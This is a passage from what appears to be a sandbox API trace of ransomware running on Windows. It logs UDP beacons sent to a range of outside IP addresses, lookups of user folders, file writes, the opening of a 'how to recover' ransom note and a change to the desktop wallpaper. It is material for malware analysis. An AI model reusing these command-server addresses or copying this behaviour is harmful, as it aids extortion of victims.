buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.154"), tolen=16 | out: buf=0x378070*) returned 53 [0090.421] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.155"), tolen=16 | out: buf=0x378070*) returned 53 [0090.421] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.156"), tolen=16 | out: buf=0x378070*) returned 53 [0090.421] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.157"), tolen=16 | out: buf=0x378070*) returned 53 [0090.421] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.158"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.159"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.160"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.161"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.162"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.163"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.164"), tolen=16 | out: buf=0x378070*) returned 53 [0090.422] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.165"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.166"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.167"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.168"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.169"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.170"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.171"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.172"), tolen=16 | out: buf=0x378070*) returned 53 [0090.423] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.173"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.174"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.175"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.176"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.177"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.178"), tolen=16 | out: buf=0x378070*) returned 53 [0090.424] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.179"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.180"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.181"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.182"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.183"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.184"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.185"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.186"), tolen=16 | out: buf=0x378070*) returned 53 [0090.425] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.187"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.188"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.189"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.190"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.191"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.192"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.193"), tolen=16 | out: buf=0x378070*) returned 53 [0090.426] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.194"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.195"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.196"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.197"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.198"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.199"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.200"), tolen=16 | out: buf=0x378070*) returned 53 [0090.427] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.201"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.202"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.203"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.204"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.205"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.206"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.207"), tolen=16 | out: buf=0x378070*) returned 53 [0090.428] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.208"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.209"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.210"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.211"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.212"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.213"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.214"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.215"), tolen=16 | out: buf=0x378070*) returned 53 [0090.429] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.216"), tolen=16 | out: buf=0x378070*) returned 53 [0090.430] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x378070*) returned 53 [0090.430] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x378070*) returned 53 [0090.430] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x378070*) returned 53 [0090.468] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x1cf7e0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 0x0 [0090.469] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1cf5e0 | out: pszPath="C:\\Users\\EEBsYm5\\Documents") returned 0x0 [0090.469] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0xffffffff, dwFlags=0x0, pszPath=0x1cf3e0 | out: pszPath="C:\\Users\\Default\\Desktop") returned 0x0 [0090.532] WriteFile (in: hFile=0xc0, lpBuffer=0x37a738*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37a738*, lpNumberOfBytesWritten=0x1cf2a0*=0x1cb, lpOverlapped=0x0) returned 1 [0090.533] WriteFile (in: hFile=0xc0, lpBuffer=0x390bc8*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x390bc8*, lpNumberOfBytesWritten=0x1cf2a0*=0x426, lpOverlapped=0x0) returned 1 [0090.535] WriteFile (in: hFile=0xc0, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf2a0*=0x87, lpOverlapped=0x0) returned 1 [0090.536] WriteFile (in: hFile=0xc0, lpBuffer=0x37a738*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37a738*, lpNumberOfBytesWritten=0x1cf2a0*=0x1cb, lpOverlapped=0x0) returned 1 [0090.537] WriteFile (in: hFile=0xc0, lpBuffer=0x390bc8*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x390bc8*, lpNumberOfBytesWritten=0x1cf2a0*=0x426, lpOverlapped=0x0) returned 1 [0090.539] WriteFile (in: hFile=0xc0, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf2a0*=0x87, lpOverlapped=0x0) returned 1 [0090.541] WriteFile (in: hFile=0xc0, lpBuffer=0x37a738*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37a738*, lpNumberOfBytesWritten=0x1cf2a0*=0x1cb, lpOverlapped=0x0) returned 1 [0090.542] WriteFile (in: hFile=0xc0, lpBuffer=0x390bc8*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x390bc8*, lpNumberOfBytesWritten=0x1cf2a0*=0x426, lpOverlapped=0x0) returned 1 [0090.543] WriteFile (in: hFile=0xc0, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf2a0*=0x87, lpOverlapped=0x0) returned 1 [0090.544] WriteFile (in: hFile=0xc0, lpBuffer=0x37a738*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37a738*, lpNumberOfBytesWritten=0x1cf2a0*=0x1cb, lpOverlapped=0x0) returned 1 [0090.545] WriteFile (in: hFile=0xc0, lpBuffer=0x390bc8*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x390bc8*, lpNumberOfBytesWritten=0x1cf2a0*=0x426, lpOverlapped=0x0) returned 1 [0090.546] WriteFile (in: hFile=0xc0, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf2a0, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf2a0*=0x87, lpOverlapped=0x0) returned 1 [0090.547] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\EEBsYm5\\Desktop\\(_H0W_TO_REC0VER_CInq4.html", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0094.218] WriteFile (in: hFile=0xc0, lpBuffer=0x1cf7d0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x1cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x1cf7d0*, lpNumberOfBytesWritten=0x1cf7ec*=0x1, lpOverlapped=0x0) returned 1 [0094.219] CloseHandle (hObject=0xc0) returned 1 [0094.219] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1cf7f0, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Pictures") returned 1 [0094.221] WriteFile (in: hFile=0xc4, lpBuffer=0x11ffc10*, nNumberOfBytesToWrite=0x15b7, lpNumberOfBytesWritten=0x1cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x11ffc10*, lpNumberOfBytesWritten=0x1cf7ec*=0x15b7, lpOverlapped=0x0) returned 1 [0094.222] CloseHandle (hObject=0xc4) returned 1 [0094.222] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x38e5e8, fWinIni=0x3 | out: pvParam=0x38e5e8) returned 0 [0094.498] GetModuleHandleW (lpModuleName=0x0) returned 0x11c0000 [0094.498] GetModuleHandleW (lpModuleName=0x0) returned 0x11c0000 [0094.499] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x1cfa28 | out: phModule=0x1cfa28) returned 0 [0094.499] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0xa8c [0040.140] GetLastError () returned 0x57 [0040.140] SetLastError (dwErrCode=0x57) [0040.140] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0040.140] GetLastError () returned 0x57 [0040.140] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0040.141] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0040.141] GetLastError () returned 0x57 [0040.141] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0040.141] GetCurrentThreadId () returned 0xa8c [0040.141] GetCurrentThreadId () returned 0xa8c [0040.141] RtlWakeConditionVariable (in: ConditionVariable=0x379f54 | out: ConditionVariable=0x379f54) [0040.181] GetCurrentThreadId () returned 0xa8c [0040.181] GetCurrentThreadId () returned 0xa8c [0040.182] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xa4f408 | out: lpWSAData=0xa4f408) returned 0 [0040.185] socket (af=2, type=2, protocol=0) returned 0xe0 [0040.186] htons (hostshort=0x1af5) returned 0xf51a [0040.186] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0040.186] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x378028*) returned 49 [0040.187] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x378028*) returned 49 [0040.188] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x378028*) returned 49 [0040.189] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x378028*) returned 49 [0040.190] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x378028*) returned 49 [0040.191] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.11"), tolen=16 | out: buf=0x378028*) returned 49 [0040.192] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.12"), tolen=16 | out: buf=0x378028*) returned 49 [0040.193] sendto (in: 